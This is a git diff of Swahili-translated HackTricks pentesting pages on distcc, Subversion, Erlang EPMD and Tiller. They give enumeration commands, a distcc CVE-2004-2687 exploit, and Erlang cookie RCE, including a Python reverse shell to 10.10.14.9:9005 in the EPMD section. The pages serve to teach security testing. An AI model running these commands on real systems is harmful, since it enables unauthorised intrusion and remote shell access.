Mbinu hii inasisitiza umuhimu wa usanidi salama wa SAProuter na kuonyesha uwezekano wa kufikia mitandao ya ndani kupitia upimaji wa udukuzi ulioelekezwa. Kuweka salama SAP routers ipasavyo na kuelewa jukumu lao katika usanifu wa usalama wa mtandao ni muhimu kwa kulinda dhidi ya ufikiaji usioidhinishwa.
Kwa maelezo zaidi kuhusu moduli za Metasploit na matumizi yake, tembelea [kituo cha Rapid7](http://www.rapid7.com/db).
## **Marejeo**
@ -78,18 +80,17 @@ Kwa habari zaidi kuhusu moduli za Metasploit na matumizi yao, tembelea [database
* `port:3299 !HTTP Network packet too big`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

49
network-services-pentesting/3632-pentesting-distcc.md
View file

@ -1,41 +1,58 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**Distcc** ni chombo kinachoboresha **mchakato wa uundaji** kwa kutumia **nguvu za usindikaji zilizotulia** za kompyuta nyingine kwenye mtandao. Wakati **distcc** inapowekwa kwenye mashine, mashine hii inaweza kusambaza **kazi zake za uundaji** kwa mfumo mwingine. Mfumo huu wa mpokeaji lazima uwe unatekeleza **daemani ya distccd** na lazima awe na **kompaila inayoweza kufanya kazi** imewekwa ili iprocess nambari iliyotumwa.
**Distcc** ni chombo kinachoboresha **mchakato wa uundaji** kwa kutumia **nguvu ya usindikaji isiyotumika** ya kompyuta nyingine katika mtandao. Wakati **distcc** imewekwa kwenye mashine, mashine hii ina uwezo wa kusambaza **kazi za uundaji** kwa mfumo mwingine. Mfumo huu wa kupokea lazima uwe na **distccd daemon** inayoendesha na lazima iwe na **compiler** inayofaa iliyowekwa ili kushughulikia msimbo uliopelekwa.
**Bandari ya chaguo:** 3632
**Default port:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Utekaji
# Ukatili
Angalia ikiwa ina hatari ya **CVE-2004-2687** ya kutekeleza nambari za aina yoyote:
Angalia ikiwa ina udhaifu wa **CVE-2004-2687** kutekeleza msimbo wa kawaida:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Sidhani shodan inagundua huduma hii._
_Sidhani kama shodan inagundua huduma hii._
# Vyanzo
# Resources
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Mchapishaji: **Álex B (@r1p)**
Post created by **Álex B (@r1p)**
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

117
network-services-pentesting/3690-pentesting-subversion-svn-server.md
View file

@ -1,121 +1,50 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**Subversion** ni mfumo wa **udhibiti wa toleo** uliojumuishwa ambao unacheza jukumu muhimu katika kusimamia data ya sasa na ya zamani ya miradi. Kwa kuwa ni zana ya **chanzo wazi**, inafanya kazi chini ya **leseni ya Apache**. Mfumo huu unatambuliwa sana kwa uwezo wake katika **kudhibiti matoleo ya programu na udhibiti wa marekebisho**, ikihakikisha kuwa watumiaji wanaweza kufuatilia mabadiliko kwa ufanisi kwa muda.
**Subversion** ni mfumo wa **udhibiti wa toleo** wa kati ambao una jukumu muhimu katika kusimamia data za sasa na za kihistoria za miradi. Ikiwa ni chombo cha **chanzo wazi**, kinafanya kazi chini ya **leseni ya Apache**. Mfumo huu unatambuliwa sana kwa uwezo wake katika **udhibiti wa toleo la programu na udhibiti wa marekebisho**, kuhakikisha kwamba watumiaji wanaweza kufuatilia mabadiliko kwa ufanisi kwa muda.
**Bandari ya chaguo-msingi:** 3690
**Port ya kawaida:** 3690
```
PORT STATE SERVICE
3690/tcp open svnserve Subversion
```
## Kukamata Bango
Banner Grabbing ni mbinu ya kuchunguza maelezo ya ziada kuhusu seva ya Subversion (SVN) kwa kusoma bango lake. Bango ni ujumbe unaotumwa na seva wakati mteja anapojiunga nayo. Mbinu hii inaweza kutumika kujua toleo la SVN inayotumika na maelezo mengine muhimu kama vile jina la seva na mfumo wa uendeshaji.
Kukamata bango kunaweza kufanywa kwa kutumia zana kama `telnet` au `nc` (netcat). Kwa kawaida, unahitaji kujua anwani ya IP na namba ya bandari ya seva ya SVN ili kufanya kukamata bango.
Kwa mfano, unaweza kutumia amri ifuatayo kwa kutumia `telnet`:
```bash
telnet <anwani ya IP ya seva> <namba ya bandari>
```
Baada ya kuunganisha, bango litatokea kwenye skrini yako. Unaweza kusoma maelezo yaliyomo kwenye bango ili kupata habari muhimu kuhusu seva ya SVN.
Kukamata bango ni hatua ya kwanza katika mchakato wa uchunguzi wa seva ya SVN. Inaweza kusaidia kujua zaidi kuhusu mazingira ya seva na kusaidia katika hatua zingine za uchunguzi na uvamizi.
## Kupata Bango
```
nc -vn 10.10.10.10 3690
```
## Uchambuzi
### Kugundua
Kabla ya kuanza kuchunguza seva ya Subversion (SVN), ni muhimu kufanya uchambuzi wa awali ili kupata habari muhimu. Hapa kuna njia kadhaa za kufanya hivyo:
#### 1. Kutumia Nmap
Tumia Nmap kutambua ikiwa seva ya SVN inafanya kazi na kugundua bandari zinazotumiwa na huduma hiyo. Unaweza kutumia amri ifuatayo:
```bash
nmap -p 3690 <IP>
```
#### 2. Kuchunguza tovuti
Angalia tovuti ya lengo na uangalie ikiwa inatoa viungo vya kupakua programu ya SVN au habari yoyote inayohusiana na SVN.
#### 3. Kuchunguza faili za konfigurisheni
Tafuta faili za konfigurisheni za SVN kwenye seva. Faili muhimu za konfigurisheni ni `svnserve.conf` na `passwd`. Unaweza kuzipata kwa kutumia amri ifuatayo:
```bash
find / -name svnserve.conf 2>/dev/null
find / -name passwd 2>/dev/null
```
#### 4. Kuchunguza metadata ya SVN
Tumia amri ifuatayo kuchunguza metadata ya SVN:
```bash
svn info svn://<IP>
```
#### 5. Kuchunguza historia ya SVN
Tumia amri ifuatayo kuchunguza historia ya SVN:
```bash
svn log svn://<IP>
```
#### 6. Kuchunguza mizizi ya SVN
Tumia amri ifuatayo kuchunguza mizizi ya SVN:
```bash
svn ls svn://<IP>
```
#### 7. Kuchunguza toleo la SVN
Tumia amri ifuatayo kuchunguza toleo la SVN:
```bash
svn --version
```
Baada ya kufanya uchambuzi huu, utakuwa na habari muhimu kuhusu seva ya SVN na utaweza kuendelea na hatua zingine za uchunguzi.
## Uhesabuzi
```bash
svn ls svn://10.10.10.203 #list
svn log svn://10.10.10.203 #Commit history
svn checkout svn://10.10.10.203 #Download the repository
svn up -r 2 #Go to revision 2 inside the checkout folder
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

78
network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md
View file

@ -1,32 +1,33 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Info
**Erlang Port Mapper Daemon (epmd)** hutumika kama mratibu wa mifano iliyosambazwa ya Erlang. Inawajibika kwa kufanya ramani ya majina ya alama ya nodi kuwa anwani za mashine, kwa msingi huu inahakikisha kuwa kila jina la nodi linahusishwa na anwani maalum. Jukumu hili la **epmd** ni muhimu kwa mwingiliano na mawasiliano laini kati ya nodi tofauti za Erlang kwenye mtandao.
**Erlang Port Mapper Daemon (epmd)** inafanya kazi kama mratibu wa mifano ya Erlang iliyosambazwa. Inawajibika kwa kuunganisha majina ya nodi ya alama na anwani za mashine, kwa msingi kuhakikisha kwamba kila jina la nodi linahusishwa na anwani maalum. Jukumu hili la **epmd** ni muhimu kwa mwingiliano na mawasiliano yasiyo na mshono kati ya nodi tofauti za Erlang katika mtandao.
**Bandari ya chaguo-msingi**: 4369
**Default port**: 4369
```
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
```
Hii hutumiwa kwa chaguo-msingi kwenye ufungaji wa RabbitMQ na CouchDB.
Hii inatumika kama chaguo la msingi kwenye usakinishaji wa RabbitMQ na CouchDB.
# Uchunguzi
# Uhesabu
## Kwa Mkono
## Mikono
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
@ -37,20 +38,6 @@ erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## Kiotomatiki
Erlang Port Mapper Daemon (EPMD) ni huduma ya msingi katika mazingira ya Erlang ambayo inaruhusu mawasiliano kati ya mchakato wa Erlang kwenye seva tofauti. Kwa kawaida, EPMD inasikiliza kwa TCP kwenye bandari 4369.
Kwa kuzingatia umuhimu wake katika mawasiliano ya mchakato wa Erlang, EPMD inaweza kuwa hatari ikiwa imeachwa wazi au ikiwa ina udhaifu. Kwa hivyo, wakati wa kufanya pentesting, ni muhimu kuchunguza EPMD na kuchunguza ikiwa kuna njia yoyote ya kuvunja usalama.
Kuna njia kadhaa za kufanya hivyo. Moja ya njia ni kutumia nmap kuchunguza bandari 4369 kwenye anwani ya IP ya lengo. Kwa mfano, unaweza kutumia amri ifuatayo:
```
nmap -p 4369 <IP_address>
```
Ikiwa bandari 4369 imefunguliwa, hii inaweza kuashiria kuwa EPMD inafanya kazi na inaweza kupatikana. Kisha, unaweza kutumia zana kama `epmd_client` kuchunguza habari zaidi kuhusu EPMD na mchakato wa Erlang unaofanya kazi kwenye seva.
Kwa kumalizia, kuchunguza EPMD ni hatua muhimu katika pentesting ya mazingira ya Erlang. Kwa kutumia zana sahihi na kufanya uchunguzi wa kina, unaweza kugundua udhaifu wowote na kuchukua hatua za kurekebisha ili kuzuia uwezekano wa uvunjaji wa usalama.
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
@ -67,9 +54,9 @@ PORT STATE SERVICE VERSION
```
# Erlang Cookie RCE
## Uhusiano wa Mbali
## Remote Connection
Ikiwa unaweza **kuvuja kuki ya uthibitisho**, utaweza kutekeleza nambari kwenye mwenyeji. Kawaida, kuki hii iko katika `~/.erlang.cookie` na hutengenezwa na erlang wakati wa kuanza kwa kwanza. Ikiwa haijasahihishwa au kuwekwa kwa mkono, ni herufi za nasibu \[A:Z] zenye urefu wa herufi 20.
Ikiwa unaweza **kutoa taarifa za Authentication cookie** utaweza kutekeleza msimbo kwenye mwenyeji. Kawaida, cookie hii inapatikana katika `~/.erlang.cookie` na inatengenezwa na erlang wakati wa kuanza kwa mara ya kwanza. Ikiwa haijabadilishwa au kuwekwa kwa mikono ni mfuatano wa nasibu \[A:Z] wenye urefu wa herufi 20.
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
@ -81,22 +68,22 @@ At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
Maelezo zaidi yanapatikana katika [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Mwandishi pia anashiriki programu ya kuvunja nguvu kuki:
Zaidi ya habari katika [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Mwandishi pia anashiriki programu ya kubruteforce cookie:
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
## Uunganisho wa Ndani
## Muunganisho wa Mitaa
Katika kesi hii, tutatumia CouchDB kuongeza mamlaka kwa kiwango cha ndani:
Katika kesi hii tutatumia CouchDB kuboresha mamlaka kwa ndani:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
Mfano uliopatikana kutoka [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Unaweza kutumia **Canape HTB machine** kwa **mazoezi** ya jinsi ya **kutumia udhaifu huu**.
Mfano umechukuliwa kutoka [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Unaweza kutumia **Canape HTB machine** **kufanya mazoezi** jinsi ya **kutumia hii vuln**.
## Metasploit
```bash
@ -105,19 +92,20 @@ msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan
* `port:4369 "kwenye bandari"`
* `port:4369 "katika bandari"`
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

89
network-services-pentesting/44134-pentesting-tiller-helm.md
View file

@ -1,30 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Helm ni **meneja wa pakiti** kwa Kubernetes. Inaruhusu kufunga faili za YAML na kuzisambaza kwenye repositori za umma na binafsi. Pakiti hizi huitwa **Helm Charts**. **Tiller** ni **huduma** inayotumika kwa chaguo-msingi kwenye bandari 44134 inayotoa huduma.
